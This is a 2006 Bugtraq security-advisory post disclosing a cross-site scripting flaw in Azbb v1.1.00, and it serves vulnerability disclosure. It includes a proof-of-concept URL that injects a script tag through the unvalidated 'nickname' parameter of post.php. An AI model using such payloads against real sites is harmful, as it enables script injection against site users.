[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[CORRECTIONS AND ADDITIONS ]Azbb v1.1.00 Cross-Site Scripting

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [CORRECTIONS AND ADDITIONS ]Azbb v1.1.00 Cross-Site Scripting
From: roozbeh_afrasiabi@xxxxxxxxx
Date: 28 Jan 2006 07:30:48 -0000

PoC :
--------------------

1)

This flaw exists because the application does not validate the "nickname"
variable upon submission to the post.php script via the POST method.

h**p://www.[target]/post.php?nickname="><script>alert('XSS')</script><!--

--------------------

Prev by Date: Multiple vulnerabilities in CommuniGate Pro Server
Next by Date: LibAST 0.7 Release Fixes Security Vulnerability
Previous by thread: Multiple vulnerabilities in CommuniGate Pro Server
Next by thread: LibAST 0.7 Release Fixes Security Vulnerability
Index(es):
- Date
- Thread